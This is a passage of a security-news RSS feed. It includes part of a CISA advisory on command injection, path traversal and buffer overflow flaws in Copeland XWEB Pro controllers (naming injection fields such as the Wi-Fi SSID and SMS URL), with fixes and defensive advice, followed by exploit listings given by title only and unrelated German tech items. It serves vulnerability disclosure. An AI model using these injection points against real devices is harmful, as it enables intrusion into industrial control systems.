<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-20764">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-25196</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by injecting malicious input into the Wi-Fi SSID and/or password fields can lead to remote code execution when the configuration is processed.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-25196">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-25037</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by configuring a maliciously crafted LCD state which is later processed during system setup, enabling remote code execution.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-25037">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-22877</a></h3>
<div class="csaf-accordion-content">
<p>An arbitrary file-read vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling unauthenticated attackers to read arbitrary files on the system, and potentially causing a denial-of-service attack.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-22877">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/22.html">CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.7</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-20797</a></h3>
<div class="csaf-accordion-content">
<p>A stack based buffer overflow exists in an API route of XWEB Pro version 1.12.1 and prior, enabling unauthenticated attackers to cause stack corruption and a termination of the program.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-20797">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/121.html">CWE-121 Stack-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-3037</a></h3>
<div class="csaf-accordion-content">
<p>An OS Command injection vulnerability exists in XWEB Pro version 1.12.1 and prior, enabling an authenticated attacker to achieve remote code execution on the system by modifying malicious input injected into the MBird SMS service URL and/or code via the utility route which is later processed during system setup, leading to remote code execution.</p>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-3037">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Copeland XWEB and XWEB Pro</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Copeland</div>
<div class="ics-version"><strong>Product Version:</strong><br>Copeland XWEB 300D PRO: &lt;=1.12.1, Copeland XWEB 500D PRO: &lt;=1.12.1, Copeland XWEB 500B PRO: &lt;=1.12.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Copeland has provided a fix for the vulnerabilities and recommends users update the XWEB Pro to the latest version by going to their software update page https://webapps.copeland.com/Dixell/Pages/SystemSoftwareUpdate in the sections dedicated to the different XWEBPRO models page.</p>
<p><strong>Mitigation</strong><br>Alternatively, a user logged into an XWEB Pro with internet access can update XWEB Pro directly from Copeland servers via the menu SYSTEM -- Updates | Network.</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Amir Zaltzman and Noam Moshe of Claroty Team82 reported these vulnerabilities to CISA</li>
</ul>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities, such as:</p>
<p>Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolating them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.</p>
<p>Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<p>CISA also recommends users take the following measures to protect themselves from social engineering attacks:</p>
<p>Do not click web links or open attachments in unsolicited email messages.</p>
<p>Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.</p>
<p>Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.</p>
<p>No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.</p>
<hr>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-02-26</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-02-26</td>
<td>1</td>
<td>Initial Publication</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anzeige: Produktionsreife Webapps mit React, TypeScript & Next.js]]></title>
<description><![CDATA[React, TypeScript & Next.js über ein durchgängiges Praxisprojekt erlernen - im Live-Workshop der Golem Karrierewelt! (Golem Karrierewelt, Programmiersprachen)]]></description>
<link>https://tsecurity.de/de/3291671/it-nachrichten/anzeige-produktionsreife-webapps-mit-react-typescript-nextjs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3291671/it-nachrichten/anzeige-produktionsreife-webapps-mit-react-typescript-nextjs/</guid>
<pubDate>Mon, 16 Feb 2026 18:16:55 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[React, TypeScript &amp; Next.js über ein durchgängiges Praxisprojekt erlernen - im Live-Workshop der Golem Karrierewelt! (<a href="https://www.golem.de/specials/golemakademie/">Golem Karrierewelt</a>, <a href="https://www.golem.de/specials/programmiersprache/">Programmiersprachen</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=205469&amp;page=1&amp;ts=1771261502" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] motionEye 0.43.1b4 - RCE]]></title>
<description><![CDATA[motionEye 0.43.1b4 - RCE]]></description>
<link>https://tsecurity.de/de/3281323/poc/webapps-motioneye-0431b4-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3281323/poc/webapps-motioneye-0431b4-rce/</guid>
<pubDate>Wed, 11 Feb 2026 11:23:29 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[motionEye 0.43.1b4 - RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] OctoPrint 1.11.2 - File Upload]]></title>
<description><![CDATA[OctoPrint 1.11.2 - File Upload]]></description>
<link>https://tsecurity.de/de/3252813/poc/webapps-octoprint-1112-file-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3252813/poc/webapps-octoprint-1112-file-upload/</guid>
<pubDate>Wed, 04 Feb 2026 14:34:41 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OctoPrint 1.11.2 - File Upload]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution]]></title>
<description><![CDATA[FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution]]></description>
<link>https://tsecurity.de/de/3252795/poc/webapps-fortiweb-fabric-connector-76x-sql-injection-to-remote-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3252795/poc/webapps-fortiweb-fabric-connector-76x-sql-injection-to-remote-code-execution/</guid>
<pubDate>Wed, 04 Feb 2026 14:21:33 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] aiohttp 3.9.1 - directory traversal PoC]]></title>
<description><![CDATA[aiohttp 3.9.1 - directory traversal PoC]]></description>
<link>https://tsecurity.de/de/3252793/poc/webapps-aiohttp-391-directory-traversal-poc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3252793/poc/webapps-aiohttp-391-directory-traversal-poc/</guid>
<pubDate>Wed, 04 Feb 2026 14:21:30 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[aiohttp 3.9.1 - directory traversal PoC]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)]]></title>
<description><![CDATA[RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)]]></description>
<link>https://tsecurity.de/de/3247785/poc/webapps-rpi-jukebox-rfid-280-stored-cross-site-scripting-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3247785/poc/webapps-rpi-jukebox-rfid-280-stored-cross-site-scripting-xss/</guid>
<pubDate>Mon, 02 Feb 2026 10:11:34 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Piranha CMS 12.0 - Stored XSS in Text Block]]></title>
<description><![CDATA[Piranha CMS 12.0 - Stored XSS in Text Block]]></description>
<link>https://tsecurity.de/de/3247784/poc/webapps-piranha-cms-120-stored-xss-in-text-block/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3247784/poc/webapps-piranha-cms-120-stored-xss-in-text-block/</guid>
<pubDate>Mon, 02 Feb 2026 10:11:32 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Piranha CMS 12.0 - Stored XSS in Text Block]]></content:encoded>
</item>
<item>
<title><![CDATA[Neues über Ubuntu Touch - Linux auf dem Smartphone! [Ubuntu Touch Vorstellung]]]></title>
<description><![CDATA[Author: Linux Guides - Bewertung: 1105x - Views:35029 In diesem Video zeigt Jean eine Alternative zum Android-Betriebssystem - Ubuntu Touch! Was gibt es Neues im Jahr 2025 und wem kann es empfohlen werden?
Wenn Du das Video unterstützen willst, dann gib bitte eine Bewertung ab, und schreibe einen...]]></description>
<link>https://tsecurity.de/de/3244726/linux-tipps/neues-ueber-ubuntu-touch-linux-auf-dem-smartphone-ubuntu-touch-vorstellung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3244726/linux-tipps/neues-ueber-ubuntu-touch-linux-auf-dem-smartphone-ubuntu-touch-vorstellung/</guid>
<pubDate>Fri, 30 Jan 2026 19:52:27 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Linux Guides - Bewertung: 1105x - Views:35029 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/GS1GDgZRmEw?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>In diesem Video zeigt Jean eine Alternative zum Android-Betriebssystem - Ubuntu Touch! Was gibt es Neues im Jahr 2025 und wem kann es empfohlen werden?<br />
Wenn Du das Video unterstützen willst, dann gib bitte eine Bewertung ab, und schreibe einen Kommentar. Vielen Dank!<br />
<br />
Links:<br />
-------------------------------------<br />
- Stand Dezember 2022: Ubuntu Touch getestet - Für wen ist es geeignet? Was hat sich in den letzten Jahren getan? https://youtu.be/olNfttuk5yU<br />
- Stand Januar 2023: Ubuntu Touch auf Fairphone 2 installieren - Wie einfach ist es? https://youtu.be/RT0L17Irzs8<br />
- Unterstützte Geräte: https://devices.ubuntu-touch.io/<br />
<br />
- Linux-Guides Merch*: https://linux-guides.myspreadshop.de/<br />
- Professioneller Linux Support*: https://www.linuxguides.de/linux-support/<br />
- Linux-Arbeitsplatz für KMU & Einzelpersonen*: https://www.linuxguides.de/linux-arbeitsplatz/<br />
- Linux Mint Kurs für Anwender*: https://www.linuxguides.de/kurs-linux-mint-fur-anwender/<br />
- Offizielle Webseite: https://www.linuxguides.de<br />
- Forum: https://forum.linuxguides.de/<br />
- Unterstützen: http://unterstuetzen.linuxguides.de<br />
- Mastodon: https://mastodon.social/@LinuxGuides<br />
- X: https://twitter.com/LinuxGuides<br />
- Instagram: https://www.instagram.com/linuxguides/<br />
- Kontakt: https://www.linuxguides.de/kontakt/<br />
<br />
Inhaltsverzeichnis:<br />
-------------------------------------<br />
00:00 Über Ubuntu Touch  <br />
03:30 Bedienung allgemein  <br />
07:48 Eigene Apps und OpenStore  <br />
22:00 Webber (Webapps erstellen)  <br />
27:18 Waydroid (Android-Emulator)  <br />
36:55 Kamera und Fotoqualität  <br />
39:55 Unterstützte Geräte und Installation  <br />
43:50 Fazit und Empfehlung<br />
<br />
Haftungsausschluss:<br />
-------------------------------------<br />
Das Video dient lediglich zu Informationszwecken. Wir übernehmen keinerlei Haftung für in diesem Video gezeigte und / oder erklärte Handlungen. Es entsteht in keinem Moment Anspruch auf Schadensersatz oder ähnliches.<br />
<br />
*) Werbung<br />
<br />
#linuxguides #linux #ubuntu #smartphone #security #ubuntutouch<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] RPi-Jukebox-RFID 2.8.0 - Remote Command Execution]]></title>
<description><![CDATA[RPi-Jukebox-RFID 2.8.0 - Remote Command Execution]]></description>
<link>https://tsecurity.de/de/3218789/poc/webapps-rpi-jukebox-rfid-280-remote-command-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3218789/poc/webapps-rpi-jukebox-rfid-280-remote-command-execution/</guid>
<pubDate>Sat, 17 Jan 2026 15:06:21 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[RPi-Jukebox-RFID 2.8.0 - Remote Command Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Siklu EtherHaul Series EH-8010 - Remote Command Execution]]></title>
<description><![CDATA[Siklu EtherHaul Series EH-8010 - Remote Command Execution]]></description>
<link>https://tsecurity.de/de/3218769/poc/webapps-siklu-etherhaul-series-eh-8010-remote-command-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3218769/poc/webapps-siklu-etherhaul-series-eh-8010-remote-command-execution/</guid>
<pubDate>Sat, 17 Jan 2026 14:50:32 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Siklu EtherHaul Series EH-8010 - Remote Command Execution]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Siklu EtherHaul Series EH-8010 - Arbitrary File Upload]]></title>
<description><![CDATA[Siklu EtherHaul Series EH-8010 - Arbitrary File Upload]]></description>
<link>https://tsecurity.de/de/3218768/poc/webapps-siklu-etherhaul-series-eh-8010-arbitrary-file-upload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3218768/poc/webapps-siklu-etherhaul-series-eh-8010-arbitrary-file-upload/</guid>
<pubDate>Sat, 17 Jan 2026 14:50:30 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Siklu EtherHaul Series EH-8010 - Arbitrary File Upload]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] FreeBSD rtsold 15.x - Remote Code Execution via DNSSL]]></title>
<description><![CDATA[FreeBSD rtsold 15.x - Remote Code Execution via DNSSL]]></description>
<link>https://tsecurity.de/de/3179599/poc/webapps-freebsd-rtsold-15x-remote-code-execution-via-dnssl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3179599/poc/webapps-freebsd-rtsold-15x-remote-code-execution-via-dnssl/</guid>
<pubDate>Thu, 25 Dec 2025 19:21:00 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[FreeBSD rtsold 15.x - Remote Code Execution via DNSSL]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Chained Quiz  1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie]]></title>
<description><![CDATA[Chained Quiz  1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie]]></description>
<link>https://tsecurity.de/de/3179598/poc/webapps-chained-quiz-135-unauthenticated-insecure-direct-object-reference-via-cookie/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3179598/poc/webapps-chained-quiz-135-unauthenticated-insecure-direct-object-reference-via-cookie/</guid>
<pubDate>Thu, 25 Dec 2025 19:20:58 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Chained Quiz  1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] WordPress Quiz Maker 6.7.0.56 - SQL Injection]]></title>
<description><![CDATA[WordPress Quiz Maker 6.7.0.56 - SQL Injection]]></description>
<link>https://tsecurity.de/de/3179597/poc/webapps-wordpress-quiz-maker-67056-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3179597/poc/webapps-wordpress-quiz-maker-67056-sql-injection/</guid>
<pubDate>Thu, 25 Dec 2025 19:20:57 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WordPress Quiz Maker 6.7.0.56 - SQL Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-36743 | SolarEdge SE3680H up to 4.21 Debug Interface improper authentication]]></title>
<description><![CDATA[A vulnerability classified as critical was found in SolarEdge SE3680H up to 4.21. This impacts an unknown function of the component Debug Interface. Such manipulation leads to improper authentication.

This vulnerability is traded as CVE-2025-36743. The attack can be executed directly on the phys...]]></description>
<link>https://tsecurity.de/de/3177298/sicherheitsluecken/cve-2025-36743-solaredge-se3680h-up-to-421-debug-interface-improper-authentication/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3177298/sicherheitsluecken/cve-2025-36743-solaredge-se3680h-up-to-421-debug-interface-improper-authentication/</guid>
<pubDate>Wed, 24 Dec 2025 08:25:37 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">critical</a> was found in <a href="https://vuldb.com/?product.solaredge:se3680h">SolarEdge SE3680H up to 4.21</a>. This impacts an unknown function of the component <em>Debug Interface</em>. Such manipulation leads to improper authentication.

This vulnerability is traded as <a href="https://vuldb.com/?source_cve.336225">CVE-2025-36743</a>. The attack can be executed directly on the physical device. There is no exploit available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
